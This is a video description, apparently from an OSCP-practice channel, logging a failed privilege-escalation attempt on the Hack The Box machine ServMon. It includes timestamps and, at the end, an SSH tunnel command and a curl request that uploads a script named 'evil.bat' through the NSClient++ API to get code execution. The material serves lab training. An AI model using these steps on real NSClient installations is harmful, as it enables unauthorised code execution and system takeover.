OSCP with Matt, SERVMON HTB FAILED PE. I need help

Опубликовано: 07 Август 2026
на канале: ScriptKiddie
50
0

Failed to escalate privilege. I hate this box.


Timestamp
00:00 blah
01:20 Intro
02:25 Quick overview
06:00 Continue with the Nsclient vulnerability
10:00 Web interface is so slow.
13:00 SSH tunneling explained
42:00 No luck with the website. Going a API way.
1:44:35 No luck. Trying 48360.txt / github -RCE vulnerability.
1:57:00 Gave up. Checking online. Walkthrough doesn't work for me.


FAIL FAIL FAIL. So I gave up. I will cover windows PE next time since this took so long.














watch netstat -plant
ssh [email protected] -L 9001:127.0.0.1:8443

curl -s -k -u admin -X PUT https://127.0.0.1:9001/api/v1/scripts/ext/evil.bat --data-binary @evil.bat

https://docs.nsclient.org/api/scripts/